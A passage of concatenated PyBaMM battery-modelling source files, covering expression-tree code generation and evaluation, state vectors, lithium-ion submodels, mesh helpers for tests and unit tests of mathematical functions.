elif isinstance(symbol, pybamm.UnaryOperator):
# Index has a different syntax than other univariate operations
if isinstance(symbol, pybamm.Index):
symbol_str = "{}[{}:{}]".format(
children_vars[0], symbol.slice.start, symbol.slice.stop
)
else:
symbol_str = symbol.name + children_vars[0]
# For a Function we create two lines of code, one in constant_symbols that
# contains the function handle, the other in variable_symbols that calls that
# function on the children variables
elif isinstance(symbol, pybamm.Function):
constant_symbols[symbol.id] = symbol.function
funct_var = id_to_python_variable(symbol.id, True)
children_str = ""
for child_var in children_vars:
if children_str == "":
children_str = child_var
else:
children_str += ", " + child_var
symbol_str = "{}({})".format(funct_var, children_str)
elif isinstance(symbol, pybamm.Concatenation):
# don't bother to concatenate if there is only a single child
if isinstance(symbol, pybamm.NumpyConcatenation):
if len(children_vars) > 1:
symbol_str = "np.concatenate(({}))".format(",".join(children_vars))
else:
symbol_str = "{}".format(",".join(children_vars))
elif isinstance(symbol, pybamm.SparseStack):
if len(children_vars) > 1:
symbol_str = "scipy.sparse.vstack(({}))".format(",".join(children_vars))
else:
symbol_str = "{}".format(",".join(children_vars))
# DomainConcatenation specifies a particular ordering for the concatenation,
# which we must follow
elif isinstance(symbol, pybamm.DomainConcatenation):
slice_starts = []
all_child_vectors = []
for i in range(symbol.secondary_dimensions_npts):
child_vectors = []
for child_var, slices in zip(children_vars, symbol._children_slices):
for child_dom, child_slice in slices.items():
slice_starts.append(symbol._slices[child_dom][i].start)
child_vectors.append(
"{}[{}:{}]".format(
child_var, child_slice[i].start, child_slice[i].stop
)
)
all_child_vectors.extend(
[v for _, v in sorted(zip(slice_starts, child_vectors))]
)
if len(children_vars) > 1 or symbol.secondary_dimensions_npts > 1:
symbol_str = "np.concatenate(({}))".format(",".join(all_child_vectors))
else:
symbol_str = "{}".format(",".join(children_vars))
else:
raise NotImplementedError
# Note: we assume that y is being passed as a column vector
elif isinstance(symbol, pybamm.StateVector):
symbol_str = "y[:{}][{}]".format(
len(symbol.evaluation_array), symbol.evaluation_array
)
elif isinstance(symbol, pybamm.Time):
symbol_str = "t"
else:
raise NotImplementedError(
"Not implemented for a symbol of type '{}'".format(type(symbol))
)
variable_symbols[symbol.id] = symbol_str
def to_python(symbol, debug=False):
"""
This function converts an expression tree into a dict of constant input values, and
valid python code that acts like the tree's :func:`pybamm.Symbol.evaluate` function
Parameters
----------
symbol : :class:`pybamm.Symbol`
The symbol to convert to python code
debug : bool
If set to True, the function also emits debug code
Returns
-------
collections.OrderedDict:
dict mapping node id to a constant value. Represents all the constant nodes in
the expression tree
str:
valid python code that will evaluate all the variable nodes in the tree.
"""
constant_values = OrderedDict()
variable_symbols = OrderedDict()
find_symbols(symbol, constant_values, variable_symbols)
line_format = "{} = {}"
if debug:
variable_lines = [
"print('{}'); ".format(
line_format.format(id_to_python_variable(symbol_id, False), symbol_line)
)
+ line_format.format(id_to_python_variable(symbol_id, False), symbol_line)
+ "; print(type({0}),{0}.shape)".format(
id_to_python_variable(symbol_id, False)
)
for symbol_id, symbol_line in variable_symbols.items()
]
else:
variable_lines = [
line_format.format(id_to_python_variable(symbol_id, False), symbol_line)
for symbol_id, symbol_line in variable_symbols.items()
]
return constant_values, "\n".join(variable_lines)
class EvaluatorPython:
"""
Converts a pybamm expression tree into pure python code that will calculate the
result of calling `evaluate(t, y)` on the given expression tree.
Parameters
----------
symbol : :class:`pybamm.Symbol`
The symbol to convert to python code
"""
def __init__(self, symbol):
constants, self._variable_function = pybamm.to_python(symbol, debug=False)
# store all the constant symbols in the tree as internal variables of this
# object
for symbol_id, value in constants.items():
setattr(
self, id_to_python_variable(symbol_id, True).replace("self.", ""), value
)
# calculate the final variable that will output the result of calling `evaluate`
# on `symbol`
self._result_var = id_to_python_variable(symbol.id, symbol.is_constant())
# compile the generated python code
self._variable_compiled = compile(
self._variable_function, self._result_var, "exec"
)
# compile the line that will return the output of `evaluate`
self._return_compiled = compile(
self._result_var, "return" + self._result_var, "eval"
)
def evaluate(self, t=None, y=None, known_evals=None):
"""
Acts as a drop-in replacement for :func:`pybamm.Symbol.evaluate`
"""
# generated code assumes y is a column vector
if y is not None and y.ndim == 1:
y = y.reshape(-1, 1)
# execute code
exec(self._variable_compiled)
# don't need known_evals, but need to reproduce Symbol.evaluate signature
if known_evals is not None:
return eval(self._return_compiled), known_evals
else:
return eval(self._return_compiled)
```
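A hedged usage sketch for `EvaluatorPython` under the PyBaMM API of this vintage: build a small expression tree and evaluate it for a given `t` and `y`.

```python
import numpy as np
import pybamm

# 3 * y[0], expressed as a tree: one variable node, one constant node
expr = pybamm.StateVector(slice(0, 1)) * pybamm.Scalar(3.0)

evaluator = pybamm.EvaluatorPython(expr)
print(evaluator.evaluate(t=0, y=np.array([[2.0]])))  # [[6.0]]
```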
#### File: pybamm/expression_tree/state_vector.py
```python
import pybamm
import numpy as np
from scipy.sparse import csr_matrix, vstack
class StateVector(pybamm.Symbol):
"""
node in the expression tree that holds a slice to read from an external vector type
Parameters
----------
y_slice: slice
the slice of an external y to read
name: str, optional
the name of the node
domain : iterable of str, optional
list of domains the parameter is valid over, defaults to empty list
auxiliary_domains : dict of str, optional
dictionary of auxiliary domains
evaluation_array : list, optional
List of boolean arrays representing slices. Default is None, in which case the
evaluation_array is computed from y_slices.
*Extends:* :class:`Array`
"""
def __init__(
self,
*y_slices,
name=None,
domain=None,
auxiliary_domains=None,
evaluation_array=None,
):
for y_slice in y_slices:
if not isinstance(y_slice, slice):
raise TypeError("all y_slices must be slice objects")
if name is None:
if y_slices[0].start is None:
name = "y[:{:d}]".format(y_slice.stop)
else:
name = "y[{:d}:{:d}".format(y_slices[0].start, y_slices[0].stop)
if len(y_slices) > 1:
name += ",{:d}:{:d}".format(y_slices[1].start, y_slices[1].stop)
if len(y_slices) > 2:
name += ",...,{:d}:{:d}]".format(
y_slices[-1].start, y_slices[-1].stop
)
else:
name += "]"
else:
name += "]"
if domain is None:
domain = []
if auxiliary_domains is None:
auxiliary_domains = {}
self._y_slices = y_slices
self._first_point = y_slices[0].start
self._last_point = y_slices[-1].stop
self.set_evaluation_array(y_slices, evaluation_array)
super().__init__(name=name, domain=domain, auxiliary_domains=auxiliary_domains)
@property
def y_slices(self):
return self._y_slices
@property
def first_point(self):
return self._first_point
@property
def last_point(self):
return self._last_point
@property
def evaluation_array(self):
"""Array to use for evaluating"""
return self._evaluation_array
@property
def size(self):
return self.evaluation_array.count(True)
def set_evaluation_array(self, y_slices, evaluation_array):
"Set evaluation array using slices"
if evaluation_array is not None and pybamm.settings.debug_mode is False:
self._evaluation_array = evaluation_array
else:
array = np.zeros(y_slices[-1].stop)
for y_slice in y_slices:
array[y_slice] = True
self._evaluation_array = [bool(x) for x in array]
def set_id(self):
""" See :meth:`pybamm.Symbol.set_id()` """
self._id = hash(
(self.__class__, self.name, tuple(self.evaluation_array))
+ tuple(self.domain)
)
def _base_evaluate(self, t=None, y=None):
""" See :meth:`pybamm.Symbol._base_evaluate()`. """
if y is None:
raise TypeError("StateVector cannot evaluate input 'y=None'")
if y.shape[0] < len(self.evaluation_array):
raise ValueError(
"y is too short, so value with slice is smaller than expected"
)
else:
out = (y[: len(self._evaluation_array)])[self._evaluation_array]
if out.ndim == 1:
out = out[:, np.newaxis]
return out
def jac(self, variable):
"""
Differentiate a slice of a StateVector of size m with respect to another
slice of a StateVector of size n. This returns a (sparse) matrix of size
m x n with ones where the y slices match, and zeros elsewhere.
Parameters
----------
variable : :class:`pybamm.Symbol`
The variable with respect to which to differentiate
"""
if len(variable.y_slices) > 1:
raise NotImplementedError(
"Jacobian only implemented for a single-slice StateVector"
)
variable_y_indices = np.arange(variable.first_point, variable.last_point)
jac = csr_matrix((0, np.size(variable_y_indices)))
for y_slice in self.y_slices:
# Get indices of state vectors
slice_indices = np.arange(y_slice.start, y_slice.stop)
# Return zeros of correct size if no entries match
if np.size(np.intersect1d(slice_indices, variable_y_indices)) == 0:
jac = csr_matrix((np.size(slice_indices), np.size(variable_y_indices)))
else:
# Populate entries corresponding to matching y slices, and shift so
# that the matrix is the correct size
row = np.intersect1d(slice_indices, variable_y_indices) - y_slice.start
col = (
np.intersect1d(slice_indices, variable_y_indices)
- variable.first_point
)
data = np.ones_like(row)
jac = vstack(
[
jac,
csr_matrix(
(data, (row, col)),
shape=(np.size(slice_indices), np.size(variable_y_indices)),
),
]
)
return pybamm.Matrix(jac)
def new_copy(self):
""" See :meth:`pybamm.Symbol.new_copy()`. """
return StateVector(
*self.y_slices,
name=self.name,
domain=self.domain,
auxiliary_domains=self.auxiliary_domains,
evaluation_array=self.evaluation_array,
)
def evaluate_for_shape(self):
"""
Returns a vector of NaNs to represent the shape of a StateVector.
The size of a StateVector is the number of True elements in its evaluation_array
See :meth:`pybamm.Symbol.evaluate_for_shape()`
"""
return np.nan * np.ones((self.size, 1))
```
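A small sanity check of the slicing semantics (a sketch; the state values are arbitrary):

```python
import numpy as np
import pybamm

sv = pybamm.StateVector(slice(1, 3))
y = np.array([[10.0], [20.0], [30.0], [40.0]])
print(sv.evaluate(y=y))  # [[20.], [30.]] -- entries 1 and 2 of y
```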
#### File: pybamm/expression_tree/vector.py
```python
import pybamm
import numpy as np
from scipy.sparse import csr_matrix
class Vector(pybamm.Array):
"""node in the expression tree that holds a vector type (e.g. :class:`numpy.array`)
**Extends:** :class:`Array`
Parameters
----------
entries : numpy.array
the array associated with the node
name : str, optional
the name of the node
domain : iterable of str, optional
list of domains the parameter is valid over, defaults to empty list
"""
def __init__(self, entries, name=None, domain=[], entries_string=None):
# make sure that entries are a vector (can be a column vector)
if entries.ndim == 1:
entries = entries[:, np.newaxis]
if entries.shape[1] != 1:
raise ValueError(
"""
Entries must have 1 dimension or be column vector, not have shape {}
""".format(
entries.shape
)
)
if name is None:
name = "Column vector of length {!s}".format(entries.shape[0])
super().__init__(entries, name, domain, entries_string)
def _jac(self, variable):
""" See :meth:`pybamm.Symbol._jac()`. """
# Return zeros of correct size
jac = csr_matrix((self.size, variable.evaluation_array.count(True)))
return pybamm.Matrix(jac)
```
#### File: full_battery_models/lithium_ion/base_lithium_ion_model.py
```python
import pybamm
class BaseModel(pybamm.BaseBatteryModel):
"""
Overwrites default parameters from Base Model with default parameters for
lithium-ion models
**Extends:** :class:`pybamm.BaseBatteryModel`
"""
def __init__(self, options=None, name="Unnamed lithium-ion model"):
super().__init__(options, name)
self.param = pybamm.standard_parameters_lithium_ion
def set_standard_output_variables(self):
super().set_standard_output_variables()
# Current
i_cell = pybamm.standard_parameters_lithium_ion.current_with_time
i_cell_dim = (
pybamm.standard_parameters_lithium_ion.dimensional_current_density_with_time
)
I = pybamm.standard_parameters_lithium_ion.dimensional_current_with_time
self.variables.update(
{
"Total current density": i_cell,
"Total current density [A.m-2]": i_cell_dim,
"Current [A]": I,
}
)
# Time
time_scale = pybamm.standard_parameters_lithium_ion.tau_discharge
self.variables.update(
{
"Time [s]": pybamm.t * time_scale,
"Time [min]": pybamm.t * time_scale / 60,
"Time [h]": pybamm.t * time_scale / 3600,
"Discharge capacity [A.h]": I * pybamm.t * time_scale / 3600,
}
)
# Particle concentration and position
self.variables.update(
{
"Negative particle concentration": None,
"Positive particle concentration": None,
"Negative particle surface concentration": None,
"Positive particle surface concentration": None,
"Negative particle concentration [mol.m-3]": None,
"Positive particle concentration [mol.m-3]": None,
"Negative particle surface concentration [mol.m-3]": None,
"Positive particle surface concentration [mol.m-3]": None,
}
)
var = pybamm.standard_spatial_vars
param = pybamm.geometric_parameters
self.variables.update(
{
"r_n": var.r_n,
"r_n [m]": var.r_n * param.R_n,
"r_p": var.r_p,
"r_p [m]": var.r_p * param.R_p,
}
)
def set_reactions(self):
# Should probably refactor as this is a bit clunky at the moment
# Maybe each reaction as a Reaction class so we can just list names of classes
icd = " interfacial current density"
self.reactions = {
"main": {
"Negative": {
"s": 1 - self.param.t_plus,
"aj": "Negative electrode" + icd,
},
"Positive": {
"s": 1 - self.param.t_plus,
"aj": "Positive electrode" + icd,
},
}
}
```
#### File: submodels/current_collector/base_current_collector.py
```python
import pybamm
class BaseModel(pybamm.BaseSubModel):
"""Base class for current collector submodels
Parameters
----------
param : parameter class
The parameters to use for this submodel
**Extends:** :class:`pybamm.BaseSubModel`
"""
def __init__(self, param):
super().__init__(param)
def get_coupled_variables(self, variables):
# 1D models determine phi_s_cp
phi_s_cn = variables["Negative current collector potential"]
phi_s_cp = variables["Positive current collector potential"]
variables = self._get_standard_potential_variables(phi_s_cn, phi_s_cp)
return variables
def _get_standard_negative_potential_variables(self, phi_s_cn):
"""
A private function to obtain the standard variables which
can be derived from the negative potential in the current collector.
Parameters
----------
        phi_s_cn : :class:`pybamm.Symbol`
The potential in the current collector.
Returns
-------
variables : dict
The variables which can be derived from the potential in the
current collector.
"""
pot_scale = self.param.potential_scale
variables = {
"Negative current collector potential": phi_s_cn,
"Negative current collector potential [V]": phi_s_cn * pot_scale,
}
return variables
def _get_standard_potential_variables(self, phi_s_cn, phi_s_cp):
"""
A private function to obtain the standard variables which
can be derived from the potentials in the current collector.
Parameters
----------
        phi_s_cn, phi_s_cp : :class:`pybamm.Symbol`
The potential in the current collector.
Returns
-------
variables : dict
The variables which can be derived from the potential in the
current collector.
"""
pot_scale = self.param.potential_scale
U_ref = self.param.U_p_ref - self.param.U_n_ref
# add more to this
variables = {
"Positive current collector potential": phi_s_cp,
"Positive current collector potential [V]": U_ref + phi_s_cp * pot_scale,
"Local potential difference": phi_s_cp - phi_s_cn,
"Local potential difference [V]": U_ref + (phi_s_cp - phi_s_cn) * pot_scale,
}
variables.update(self._get_standard_negative_potential_variables(phi_s_cn))
return variables
def _get_standard_current_variables(self, i_cc, i_boundary_cc):
"""
A private function to obtain the standard variables which
can be derived from the current in the current collector.
Parameters
----------
i_cc : :class:`pybamm.Symbol`
The current in the current collector.
i_boundary_cc : :class:`pybamm.Symbol`
The current leaving the current collector and going into the cell
Returns
-------
variables : dict
The variables which can be derived from the current in the current
collector.
"""
i_typ = self.param.i_typ
# TO DO: implement grad in 2D to get i_cc
# just need this to get 1D models working for now
variables = {
"Current collector current density": i_boundary_cc,
"Current collector current density [A.m-2]": i_typ * i_boundary_cc,
}
return variables
```
#### File: stefan_maxwell/conductivity/first_order_stefan_maxwell_conductivity.py
```python
from .base_higher_order_stefan_maxwell_conductivity import BaseHigherOrder
class FirstOrder(BaseHigherOrder):
"""Class for conservation of charge in the electrolyte employing the
Stefan-Maxwell constitutive equations. (First order refers to a first-order
expression from the asymptotic reduction)
Parameters
----------
param : parameter class
The parameters to use for this submodel
domain : str, optional
The domain in which the model holds
    **Extends:** :class:`pybamm.electrolyte.stefan_maxwell.conductivity.BaseHigherOrder`
"""
def __init__(self, param, domain=None):
super().__init__(param, domain)
def _higher_order_macinnes_function(self, x):
"Linear higher order terms"
return x
def unpack(self, variables):
"Unpack variables and return leading-order x-averaged values"
c_e_av = variables["Leading-order x-averaged electrolyte concentration"]
return c_e_av
```
#### File: submodels/interface/lithium_ion.py
```python
from .base_interface import BaseInterface
from . import inverse_kinetics, kinetics
class BaseInterfaceLithiumIon(BaseInterface):
"""
    Base lithium-ion interface class
Parameters
----------
param :
model parameters
domain : str
The domain to implement the model, either: 'Negative' or 'Positive'.
**Extends:** :class:`pybamm.interface.BaseInterface`
"""
def __init__(self, param, domain):
super().__init__(param, domain)
self.reaction_name = "" # empty reaction name, assumed to be the main reaction
def _get_exchange_current_density(self, variables):
"""
A private function to obtain the exchange current density for a lithium-ion
deposition reaction.
Parameters
----------
        variables: dict
            The variables in the full model.
Returns
-------
j0 : :class: `pybamm.Symbol`
The exchange current density.
"""
c_s_surf = variables[self.domain + " particle surface concentration"]
c_e = variables[self.domain + " electrolyte concentration"]
T = variables[self.domain + " electrode temperature"]
if self.domain == "Negative":
prefactor = self.param.m_n(T) / self.param.C_r_n
elif self.domain == "Positive":
prefactor = self.param.gamma_p * self.param.m_p(T) / self.param.C_r_p
j0 = prefactor * (
c_e ** (1 / 2) * c_s_surf ** (1 / 2) * (1 - c_s_surf) ** (1 / 2)
)
return j0
def _get_open_circuit_potential(self, variables):
"""
A private function to obtain the open circuit potential and entropic change
Parameters
----------
variables: dict
The variables in the full model.
Returns
-------
ocp : :class:`pybamm.Symbol`
The open-circuit potential
dUdT : :class:`pybamm.Symbol`
The entropic change in open-circuit potential due to temperature
"""
c_s_surf = variables[self.domain + " particle surface concentration"]
T = variables[self.domain + " electrode temperature"]
if self.domain == "Negative":
ocp = self.param.U_n(c_s_surf, T)
dUdT = self.param.dUdT_n(c_s_surf)
elif self.domain == "Positive":
ocp = self.param.U_p(c_s_surf, T)
dUdT = self.param.dUdT_p(c_s_surf)
return ocp, dUdT
def _get_number_of_electrons_in_reaction(self):
if self.domain == "Negative":
ne = self.param.ne_n
elif self.domain == "Positive":
ne = self.param.ne_p
return ne
class ButlerVolmer(BaseInterfaceLithiumIon, kinetics.ButlerVolmer):
"""
Extends :class:`BaseInterfaceLithiumIon` (for exchange-current density, etc) and
:class:`kinetics.ButlerVolmer` (for kinetics)
"""
def __init__(self, param, domain):
super().__init__(param, domain)
class InverseButlerVolmer(
BaseInterfaceLithiumIon, inverse_kinetics.InverseButlerVolmer
):
"""
Extends :class:`BaseInterfaceLithiumIon` (for exchange-current density, etc) and
:class:`inverse_kinetics.InverseButlerVolmer` (for kinetics)
"""
def __init__(self, param, domain):
super().__init__(param, domain)
```
#### File: submodels/porosity/full_reaction_driven_porosity.py
```python
import pybamm
from .base_porosity import BaseModel
class Full(BaseModel):
"""Full model for reaction-driven porosity changes
Parameters
----------
param : parameter class
The parameters to use for this submodel
**Extends:** :class:`pybamm.porosity.BaseModel`
"""
def __init__(self, param):
super().__init__(param)
def get_fundamental_variables(self):
eps = pybamm.standard_variables.eps
variables = self._get_standard_porosity_variables(eps)
return variables
def get_coupled_variables(self, variables):
j_n = variables["Negative electrode interfacial current density"]
j_p = variables["Positive electrode interfacial current density"]
deps_dt_n = -self.param.beta_surf_n * j_n
deps_dt_s = pybamm.FullBroadcast(
0, "separator", auxiliary_domains={"secondary": "current collector"}
)
deps_dt_p = -self.param.beta_surf_p * j_p
deps_dt = pybamm.Concatenation(deps_dt_n, deps_dt_s, deps_dt_p)
variables.update(self._get_standard_porosity_change_variables(deps_dt))
return variables
def set_rhs(self, variables):
eps = variables["Porosity"]
deps_dt = variables["Porosity change"]
self.rhs = {eps: deps_dt}
def set_initial_conditions(self, variables):
eps = variables["Porosity"]
self.initial_conditions = {eps: self.param.eps_init}
```
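`set_rhs` pairs the porosity state with deps_dt = -beta_surf * j in each electrode, with zero change in the separator. A forward-Euler sketch of that ODE under assumed constant interfacial current densities (all numbers are illustrative, not real parameter values):
```python
beta_surf_n, beta_surf_p = 0.1, 0.05  # illustrative surface-reaction coefficients
j_n, j_p = 1.0, -1.0                  # assumed constant interfacial current densities
eps_n = eps_p = 0.3                   # initial porosities
dt, n_steps = 0.01, 100

for _ in range(n_steps):
    eps_n += dt * (-beta_surf_n * j_n)  # same rhs as the submodel above
    eps_p += dt * (-beta_surf_p * j_p)

print(eps_n, eps_p)  # ~0.2 and ~0.35 (up to float rounding): porosity shrinks where j > 0
```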
#### File: parameters/standard_current_functions/get_constant_current.py
```python
import pybamm
class GetConstantCurrent(pybamm.GetCurrent):
"""
Sets a constant input current for a simulation.
Parameters
----------
current : :class:`pybamm.Symbol` or float
The size of the current in Amperes.
**Extends:"": :class:`pybamm.GetCurrent`
"""
def __init__(self, current=pybamm.electrical_parameters.I_typ):
self.parameters = {"Current [A]": current}
self.parameters_eval = {"Current [A]": current}
def __str__(self):
return "Constant current"
def __call__(self, t):
return self.parameters_eval["Current [A]"]
```
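`GetConstantCurrent` stores the current in `parameters_eval` and returns that value whenever it is called, regardless of `t`. A stand-alone sketch of the same callable pattern with no pybamm dependency (class name and default value here are illustrative):
```python
class ConstantCurrent:
    """Minimal stand-in mirroring the callable interface above."""

    def __init__(self, current=1.0):  # 1.0 A is an arbitrary placeholder default
        self.parameters_eval = {"Current [A]": current}

    def __call__(self, t):
        return self.parameters_eval["Current [A]"]  # independent of t

current = ConstantCurrent(current=2.5)
print(current(0.0), current(3600.0))  # 2.5 2.5
```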
#### File: PyBaMM/tests/shared.py
```python
import pybamm
from scipy.sparse import eye
class SpatialMethodForTesting(pybamm.SpatialMethod):
"""Identity operators, no boundary conditions."""
def __init__(self, mesh):
super().__init__(mesh)
def gradient(self, symbol, discretised_symbol, boundary_conditions):
n = 0
for domain in symbol.domain:
n += self.mesh[domain][0].npts
gradient_matrix = pybamm.Matrix(eye(n))
return gradient_matrix @ discretised_symbol
def divergence(self, symbol, discretised_symbol, boundary_conditions):
n = 0
for domain in symbol.domain:
n += self.mesh[domain][0].npts
divergence_matrix = pybamm.Matrix(eye(n))
return divergence_matrix @ discretised_symbol
def internal_neumann_condition(
self, left_symbol_disc, right_symbol_disc, left_mesh, right_mesh
):
return pybamm.Scalar(0)
def mass_matrix(self, symbol, boundary_conditions):
n = 0
for domain in symbol.domain:
n += self.mesh[domain][0].npts
mass_matrix = pybamm.Matrix(eye(n))
return mass_matrix
def get_mesh_for_testing(
xpts=None, rpts=10, ypts=15, zpts=15, geometry=None, cc_submesh=None
):
param = pybamm.ParameterValues(
values={
"Electrode width [m]": 0.4,
"Electrode height [m]": 0.5,
"Negative tab width [m]": 0.1,
"Negative tab centre y-coordinate [m]": 0.1,
"Negative tab centre z-coordinate [m]": 0.0,
"Positive tab width [m]": 0.1,
"Positive tab centre y-coordinate [m]": 0.3,
"Positive tab centre z-coordinate [m]": 0.5,
"Negative electrode thickness [m]": 0.3,
"Separator thickness [m]": 0.3,
"Positive electrode thickness [m]": 0.3,
}
)
if geometry is None:
geometry = pybamm.Geometry("1D macro", "1D micro")
param.process_geometry(geometry)
submesh_types = {
"negative electrode": pybamm.MeshGenerator(pybamm.Uniform1DSubMesh),
"separator": pybamm.MeshGenerator(pybamm.Uniform1DSubMesh),
"positive electrode": pybamm.MeshGenerator(pybamm.Uniform1DSubMesh),
"negative particle": pybamm.MeshGenerator(pybamm.Uniform1DSubMesh),
"positive particle": pybamm.MeshGenerator(pybamm.Uniform1DSubMesh),
"current collector": pybamm.MeshGenerator(pybamm.SubMesh0D),
}
if cc_submesh:
submesh_types["current collector"] = cc_submesh
if xpts is None:
xn_pts, xs_pts, xp_pts = 40, 25, 35
else:
xn_pts, xs_pts, xp_pts = xpts, xpts, xpts
var = pybamm.standard_spatial_vars
var_pts = {
var.x_n: xn_pts,
var.x_s: xs_pts,
var.x_p: xp_pts,
var.r_n: rpts,
var.r_p: rpts,
var.y: ypts,
var.z: zpts,
}
return pybamm.Mesh(geometry, submesh_types, var_pts)
def get_p2d_mesh_for_testing(xpts=None, rpts=10):
geometry = pybamm.Geometry("1D macro", "1+1D micro")
return get_mesh_for_testing(xpts=xpts, rpts=rpts, geometry=geometry)
def get_1p1d_mesh_for_testing(
xpts=None, zpts=15, cc_submesh=pybamm.MeshGenerator(pybamm.Uniform1DSubMesh)
):
geometry = pybamm.Geometry("1+1D macro")
return get_mesh_for_testing(
xpts=xpts, zpts=zpts, geometry=geometry, cc_submesh=cc_submesh
)
def get_2p1d_mesh_for_testing(
xpts=None,
ypts=15,
zpts=15,
cc_submesh=pybamm.MeshGenerator(pybamm.ScikitUniform2DSubMesh),
):
geometry = pybamm.Geometry("2+1D macro")
return get_mesh_for_testing(
xpts=xpts, zpts=zpts, geometry=geometry, cc_submesh=cc_submesh
)
def get_unit_2p1D_mesh_for_testing(ypts=15, zpts=15):
param = pybamm.ParameterValues(
values={
"Electrode width [m]": 1,
"Electrode height [m]": 1,
"Negative tab width [m]": 1,
"Negative tab centre y-coordinate [m]": 0.5,
"Negative tab centre z-coordinate [m]": 0,
"Positive tab width [m]": 1,
"Positive tab centre y-coordinate [m]": 0.5,
"Positive tab centre z-coordinate [m]": 1,
"Negative electrode thickness [m]": 0.3,
"Separator thickness [m]": 0.3,
"Positive electrode thickness [m]": 0.3,
}
)
geometry = pybamm.Geometryxp1DMacro(cc_dimension=2)
param.process_geometry(geometry)
var = pybamm.standard_spatial_vars
var_pts = {var.x_n: 3, var.x_s: 3, var.x_p: 3, var.y: ypts, var.z: zpts}
submesh_types = {
"negative electrode": pybamm.MeshGenerator(pybamm.Uniform1DSubMesh),
"separator": pybamm.MeshGenerator(pybamm.Uniform1DSubMesh),
"positive electrode": pybamm.MeshGenerator(pybamm.Uniform1DSubMesh),
"current collector": pybamm.MeshGenerator(pybamm.ScikitUniform2DSubMesh),
}
return pybamm.Mesh(geometry, submesh_types, var_pts)
def get_discretisation_for_testing(
xpts=None, rpts=10, mesh=None, cc_method=SpatialMethodForTesting
):
if mesh is None:
mesh = get_mesh_for_testing(xpts=xpts, rpts=rpts)
spatial_methods = {
"macroscale": SpatialMethodForTesting,
"negative particle": SpatialMethodForTesting,
"positive particle": SpatialMethodForTesting,
"current collector": cc_method,
}
return pybamm.Discretisation(mesh, spatial_methods)
def get_p2d_discretisation_for_testing(xpts=None, rpts=10):
return get_discretisation_for_testing(mesh=get_p2d_mesh_for_testing(xpts, rpts))
def get_1p1d_discretisation_for_testing(xpts=None, zpts=15):
return get_discretisation_for_testing(mesh=get_1p1d_mesh_for_testing(xpts, zpts))
def get_2p1d_discretisation_for_testing(xpts=None, ypts=15, zpts=15):
return get_discretisation_for_testing(
mesh=get_2p1d_mesh_for_testing(xpts, ypts, zpts),
cc_method=pybamm.ScikitFiniteElement,
)
```
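These helpers compose mesh construction and discretisation, and the unit tests usually need only a one-liner. A sketch, assuming pybamm is installed and this `tests/shared.py` module is importable from the repo root:
```python
from tests.shared import get_discretisation_for_testing  # path assumes repo root

disc = get_discretisation_for_testing(xpts=10, rpts=5)
print(type(disc).__name__)  # Discretisation
```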
#### File: unit/test_expression_tree/test_functions.py
```python
import pybamm
import unittest
import numpy as np
import autograd.numpy as auto_np
from scipy.interpolate import interp1d
def test_function(arg):
return arg + arg
def test_const_function():
return 1
def test_multi_var_function(arg1, arg2):
return arg1 + arg2
class TestFunction(unittest.TestCase):
def test_constant_functions(self):
d = pybamm.Scalar(6)
funcd = pybamm.Function(test_const_function, d)
self.assertEqual(funcd.evaluate(), 1)
def test_function_of_one_variable(self):
a = pybamm.Symbol("a")
funca = pybamm.Function(test_function, a)
self.assertEqual(funca.name, "function (test_function)")
self.assertEqual(funca.children[0].name, a.name)
b = pybamm.Scalar(1)
sina = pybamm.Function(np.sin, b)
self.assertEqual(sina.evaluate(), np.sin(1))
self.assertEqual(sina.name, "function ({})".format(np.sin.__name__))
c = pybamm.Vector(np.linspace(0, 1))
cosb = pybamm.Function(np.cos, c)
np.testing.assert_array_equal(cosb.evaluate(), np.cos(c.evaluate()))
var = pybamm.StateVector(slice(0, 100))
y = np.linspace(0, 1, 100)[:, np.newaxis]
logvar = pybamm.Function(np.log1p, var)
np.testing.assert_array_equal(logvar.evaluate(y=y), np.log1p(y))
# use known_evals
np.testing.assert_array_equal(
logvar.evaluate(y=y, known_evals={})[0], np.log1p(y)
)
def test_with_autograd(self):
a = pybamm.StateVector(slice(0, 1))
y = np.array([5])
func = pybamm.Function(test_function, a)
self.assertEqual(func.diff(a).evaluate(y=y), 2)
self.assertEqual(func.diff(func).evaluate(), 1)
func = pybamm.Function(auto_np.sin, a)
self.assertEqual(func.evaluate(y=y), np.sin(a.evaluate(y=y)))
self.assertEqual(func.diff(a).evaluate(y=y), np.cos(a.evaluate(y=y)))
func = pybamm.Function(auto_np.exp, a)
self.assertEqual(func.evaluate(y=y), np.exp(a.evaluate(y=y)))
self.assertEqual(func.diff(a).evaluate(y=y), np.exp(a.evaluate(y=y)))
# multiple variables
func = pybamm.Function(test_multi_var_function, 4 * a, 3 * a)
self.assertEqual(func.diff(a).evaluate(y=y), 7)
def test_function_of_multiple_variables(self):
a = pybamm.Variable("a")
b = pybamm.Parameter("b")
func = pybamm.Function(test_multi_var_function, a, b)
self.assertEqual(func.name, "function (test_multi_var_function)")
self.assertEqual(func.children[0].name, a.name)
self.assertEqual(func.children[1].name, b.name)
# test eval and diff
a = pybamm.StateVector(slice(0, 1))
b = pybamm.StateVector(slice(1, 2))
y = np.array([5, 2])
func = pybamm.Function(test_multi_var_function, a, b)
self.assertEqual(func.evaluate(y=y), 7)
self.assertEqual(func.diff(a).evaluate(y=y), 1)
self.assertEqual(func.diff(b).evaluate(y=y), 1)
self.assertEqual(func.diff(func).evaluate(), 1)
def test_exceptions(self):
a = pybamm.Variable("a", domain="something")
b = pybamm.Variable("b", domain="something else")
with self.assertRaises(pybamm.DomainError):
pybamm.Function(test_multi_var_function, a, b)
def test_function_unnamed(self):
t = np.linspace(0, 1)
entries = 2 * t
interpfun = interp1d(t, entries)
fun = pybamm.Function(interpfun, pybamm.t)
self.assertEqual(
fun.name, "function (<class 'scipy.interpolate.interpolate.interp1d'>)"
)
class TestSpecificFunctions(unittest.TestCase):
def test_cos(self):
a = pybamm.Scalar(3)
fun = pybamm.cos(a)
self.assertIsInstance(fun, pybamm.Cos)
self.assertEqual(fun.children[0].id, a.id)
self.assertEqual(fun.evaluate(), np.cos(3))
self.assertEqual(fun.diff(a).evaluate(), -np.sin(3))
# test simplify
y = pybamm.StateVector(slice(0, 1))
fun = pybamm.cos(y)
self.assertEqual(fun.id, fun.simplify().id)
def test_cosh(self):
a = pybamm.Scalar(3)
fun = pybamm.cosh(a)
self.assertIsInstance(fun, pybamm.Cosh)
self.assertEqual(fun.children[0].id, a.id)
self.assertEqual(fun.evaluate(), np.cosh(3))
self.assertEqual(fun.diff(a).evaluate(), np.sinh(3))
def test_exp(self):
a = pybamm.Scalar(3)
fun = pybamm.exp(a)
self.assertIsInstance(fun, pybamm.Exponential)
self.assertEqual(fun.children[0].id, a.id)
